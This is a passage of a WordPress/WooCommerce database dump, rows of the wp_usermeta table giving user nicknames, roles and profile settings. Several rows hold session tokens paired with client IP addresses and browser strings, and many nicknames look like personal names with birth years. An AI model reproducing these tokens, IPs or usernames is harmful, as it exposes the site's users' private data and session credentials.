INSERT INTO `wp_usermeta` VALUES (21048, 1419, '_yoast_wpseo_profile_updated', '1498721889'); 
INSERT INTO `wp_usermeta` VALUES (21049, 1419, 'session_tokens', 'a:1:{s:64:"21fce08ee5a1b6086410a869b0a69a08f9abfc963c069a2104a24ebb9b58191e";a:4:{s:10:"expiration";i:1499931498;s:2:"ip";s:11:"62.0.34.134";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1498721898;}}'); 
INSERT INTO `wp_usermeta` VALUES (21050, 1419, 'last_update', '1498721980'); 
INSERT INTO `wp_usermeta` VALUES (21051, 1420, 'nickname', 'bperla1977'); 
INSERT INTO `wp_usermeta` VALUES (21052, 1420, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21053, 1420, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21054, 1420, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21055, 1420, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21056, 1420, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21057, 1420, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21058, 1420, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21059, 1420, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21060, 1420, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21061, 1420, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21062, 1420, '_yoast_wpseo_profile_updated', '1498727329'); 
INSERT INTO `wp_usermeta` VALUES (21063, 1420, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21064, 1421, 'nickname', 'jluke1421988'); 
INSERT INTO `wp_usermeta` VALUES (21065, 1421, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21066, 1421, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21067, 1421, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21068, 1421, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21069, 1421, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21070, 1421, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21071, 1421, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21072, 1421, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21073, 1421, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21074, 1421, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21075, 1421, '_yoast_wpseo_profile_updated', '1498730583'); 
INSERT INTO `wp_usermeta` VALUES (21076, 1421, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21077, 1422, 'nickname', 'crghaly1953'); 
INSERT INTO `wp_usermeta` VALUES (21078, 1422, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21079, 1422, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21080, 1422, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21081, 1422, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21082, 1422, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21083, 1422, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21084, 1422, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21085, 1422, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21086, 1422, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21087, 1422, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21088, 1422, '_yoast_wpseo_profile_updated', '1498733137'); 
INSERT INTO `wp_usermeta` VALUES (21089, 1422, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21090, 1423, 'nickname', 'tom.fawns'); 
INSERT INTO `wp_usermeta` VALUES (21091, 1423, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21092, 1423, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21093, 1423, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21094, 1423, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21095, 1423, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21096, 1423, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21097, 1423, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21098, 1423, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21099, 1423, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21100, 1423, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21101, 1423, '_yoast_wpseo_profile_updated', '1498736809'); 
INSERT INTO `wp_usermeta` VALUES (21102, 1423, 'session_tokens', 'a:1:{s:64:"2369069d569cd53d59aaa9022e78b13025b289abbf100ac9d7a443976705cfdb";a:4:{s:10:"expiration";i:1499946419;s:2:"ip";s:12:"192.75.48.13";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1498736819;}}'); 
INSERT INTO `wp_usermeta` VALUES (21103, 1424, 'nickname', 'fangj681994'); 
INSERT INTO `wp_usermeta` VALUES (21104, 1424, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21105, 1424, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21106, 1424, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21107, 1424, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21108, 1424, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21109, 1424, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21110, 1424, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21111, 1424, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21112, 1424, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21113, 1424, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21114, 1424, '_yoast_wpseo_profile_updated', '1498737642'); 
INSERT INTO `wp_usermeta` VALUES (21115, 1424, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21116, 1425, 'nickname', 'igoday1983'); 
INSERT INTO `wp_usermeta` VALUES (21117, 1425, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21118, 1425, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21119, 1425, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21120, 1425, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21121, 1425, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21122, 1425, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21123, 1425, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21124, 1425, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21125, 1425, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21126, 1425, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21127, 1425, '_yoast_wpseo_profile_updated', '1498737937'); 
INSERT INTO `wp_usermeta` VALUES (21128, 1425, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21129, 1426, 'nickname', 'sergije.jovanovic1960'); 
INSERT INTO `wp_usermeta` VALUES (21130, 1426, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21131, 1426, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21132, 1426, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21133, 1426, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21134, 1426, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21135, 1426, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21136, 1426, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21137, 1426, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21138, 1426, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21139, 1426, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21140, 1426, '_yoast_wpseo_profile_updated', '1498738688'); 
INSERT INTO `wp_usermeta` VALUES (21141, 1426, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21142, 1427, 'nickname', 'ssmith2004'); 
INSERT INTO `wp_usermeta` VALUES (21143, 1427, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21144, 1427, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21145, 1427, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21146, 1427, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21147, 1427, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21148, 1427, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21149, 1427, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21150, 1427, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21151, 1427, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21152, 1427, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21153, 1427, '_yoast_wpseo_profile_updated', '1498738948'); 
INSERT INTO `wp_usermeta` VALUES (21154, 1427, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21155, 1428, 'nickname', 'alexandra.jung'); 
INSERT INTO `wp_usermeta` VALUES (21156, 1428, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21157, 1428, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21158, 1428, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21159, 1428, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21160, 1428, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21161, 1428, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21162, 1428, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21163, 1428, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21164, 1428, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21165, 1428, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21166, 1428, '_yoast_wpseo_profile_updated', '1498740865'); 
INSERT INTO `wp_usermeta` VALUES (21168, 1428, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (21169, 1401, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (21170, 1429, 'nickname', 'fishingdude441997'); 
INSERT INTO `wp_usermeta` VALUES (21171, 1429, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21172, 1429, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21173, 1429, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21174, 1429, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21175, 1429, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21176, 1429, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21177, 1429, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21178, 1429, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21179, 1429, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21180, 1429, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21181, 1429, '_yoast_wpseo_profile_updated', '1498745765'); 
INSERT INTO `wp_usermeta` VALUES (21182, 1429, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21183, 1430, 'nickname', 'michael.cragg'); 
INSERT INTO `wp_usermeta` VALUES (21184, 1430, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21185, 1430, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21186, 1430, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21187, 1430, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21188, 1430, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21189, 1430, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21190, 1430, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21191, 1430, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21192, 1430, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21193, 1430, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21194, 1430, '_yoast_wpseo_profile_updated', '1498749443'); 
INSERT INTO `wp_usermeta` VALUES (21195, 1430, 'session_tokens', 'a:1:{s:64:"44f39d14201d4e150b926a0d8eca620f470bd6dfc92c689f4c30457ef30c9e85";a:4:{s:10:"expiration";i:1499959054;s:2:"ip";s:14:"192.107.246.80";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1498749454;}}'); 
INSERT INTO `wp_usermeta` VALUES (21196, 1430, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (21197, 1431, 'nickname', 'victor.potapenko1989'); 
INSERT INTO `wp_usermeta` VALUES (21198, 1431, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21199, 1431, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21200, 1431, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21201, 1431, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21202, 1431, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21203, 1431, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21204, 1431, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21205, 1431, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21206, 1431, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21207, 1431, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21208, 1431, '_yoast_wpseo_profile_updated', '1498749699'); 
INSERT INTO `wp_usermeta` VALUES (21209, 1431, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21210, 1432, 'nickname', 'ssmith03862000'); 
INSERT INTO `wp_usermeta` VALUES (21211, 1432, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21212, 1432, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21213, 1432, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21214, 1432, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21215, 1432, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21216, 1432, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21217, 1432, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21218, 1432, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21219, 1432, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21220, 1432, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21221, 1432, '_yoast_wpseo_profile_updated', '1498749758'); 
INSERT INTO `wp_usermeta` VALUES (21222, 1432, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21223, 1433, 'nickname', 'wmhumphrey1979'); 
INSERT INTO `wp_usermeta` VALUES (21224, 1433, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21225, 1433, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21226, 1433, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21227, 1433, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21228, 1433, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21229, 1433, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21230, 1433, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21231, 1433, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21232, 1433, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21233, 1433, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21234, 1433, '_yoast_wpseo_profile_updated', '1498750549'); 
INSERT INTO `wp_usermeta` VALUES (21235, 1433, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21236, 658, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (21237, 1434, 'nickname', 'hjcupertino2001'); 
INSERT INTO `wp_usermeta` VALUES (21238, 1434, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21239, 1434, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21240, 1434, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21241, 1434, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21242, 1434, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21243, 1434, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21244, 1434, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21245, 1434, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21246, 1434, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21247, 1434, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21248, 1434, '_yoast_wpseo_profile_updated', '1498752159'); 
INSERT INTO `wp_usermeta` VALUES (21249, 1434, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21250, 1435, 'nickname', 'dmdomin1953'); 
INSERT INTO `wp_usermeta` VALUES (21251, 1435, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21252, 1435, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21253, 1435, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21254, 1435, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21255, 1435, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21256, 1435, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21257, 1435, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21258, 1435, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21259, 1435, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21260, 1435, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21261, 1435, '_yoast_wpseo_profile_updated', '1498754579'); 
INSERT INTO `wp_usermeta` VALUES (21262, 1435, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21263, 1436, 'nickname', 'cburke11997'); 
INSERT INTO `wp_usermeta` VALUES (21264, 1436, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21265, 1436, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21266, 1436, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21267, 1436, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21268, 1436, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21269, 1436, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21270, 1436, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21271, 1436, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21272, 1436, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21273, 1436, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21274, 1436, '_yoast_wpseo_profile_updated', '1498756947'); 
INSERT INTO `wp_usermeta` VALUES (21275, 1436, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21276, 1437, 'nickname', 'waynerogers11955'); 
INSERT INTO `wp_usermeta` VALUES (21277, 1437, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21278, 1437, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21279, 1437, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21280, 1437, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21281, 1437, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21282, 1437, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21283, 1437, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21284, 1437, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21285, 1437, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21286, 1437, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21287, 1437, '_yoast_wpseo_profile_updated', '1498757219'); 
INSERT INTO `wp_usermeta` VALUES (21288, 1437, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21289, 1438, 'nickname', 'hojr20001991'); 
INSERT INTO `wp_usermeta` VALUES (21290, 1438, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21291, 1438, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21292, 1438, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21293, 1438, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21294, 1438, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21295, 1438, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21296, 1438, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21297, 1438, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21298, 1438, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21299, 1438, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21300, 1438, '_yoast_wpseo_profile_updated', '1498757341'); 
INSERT INTO `wp_usermeta` VALUES (21301, 1438, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21302, 1439, 'nickname', 'barbara.decaire'); 
INSERT INTO `wp_usermeta` VALUES (21303, 1439, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21304, 1439, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21305, 1439, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21306, 1439, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21307, 1439, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21308, 1439, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21309, 1439, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21310, 1439, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21311, 1439, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21312, 1439, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21313, 1439, '_yoast_wpseo_profile_updated', '1498758293'); 
INSERT INTO `wp_usermeta` VALUES (21314, 1439, 'session_tokens', 'a:1:{s:64:"5cd2fbd2caae8b793a79e4a4a91c4d42a8acb903cd2dcfe54ce839749d63fe53";a:4:{s:10:"expiration";i:1499967903;s:2:"ip";s:12:"199.64.6.150";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1498758303;}}'); 
INSERT INTO `wp_usermeta` VALUES (21315, 1439, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (21316, 1440, 'nickname', 'ktbergeron1997'); 
INSERT INTO `wp_usermeta` VALUES (21317, 1440, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21318, 1440, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21319, 1440, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21320, 1440, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21321, 1440, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21322, 1440, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21323, 1440, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21324, 1440, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21325, 1440, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21326, 1440, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21327, 1440, '_yoast_wpseo_profile_updated', '1498760151'); 
INSERT INTO `wp_usermeta` VALUES (21328, 1440, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (21329, 1441, 'nickname', 'g.allchin'); 
INSERT INTO `wp_usermeta` VALUES (21330, 1441, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21331, 1441, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21332, 1441, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21333, 1441, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21334, 1441, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21335, 1441, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21336, 1441, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21337, 1441, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21338, 1441, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21339, 1441, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21340, 1441, '_yoast_wpseo_profile_updated', '1498760437'); 
INSERT INTO `wp_usermeta` VALUES (21342, 1441, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (21343, 1442, 'nickname', 'rafael_mulero'); 
INSERT INTO `wp_usermeta` VALUES (21344, 1442, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21345, 1442, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (21346, 1442, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (21347, 1442, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21348, 1442, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (21349, 1442, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (21350, 1442, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (21351, 1442, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (21352, 1442, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (21353, 1442, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (21354, 1442, '_yoast_wpseo_profile_updated', '1498762631'); 
INSERT INTO `wp_usermeta` VALUES (21355, 1442, 'session_tokens', 'a:1:{s:64:"e41a5020bcf07b51e87567afea255dea14b3ab154dd4ffbd66c353d33ec2e0f1";a:4:{s:10:"expiration";i:1499972241;s:2:"ip";s:15:"104.129.194.123";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1498762641;}}'); 
INSERT INTO `wp_usermeta` VALUES (21356, 1443, 'nickname', 'trl21985'); 
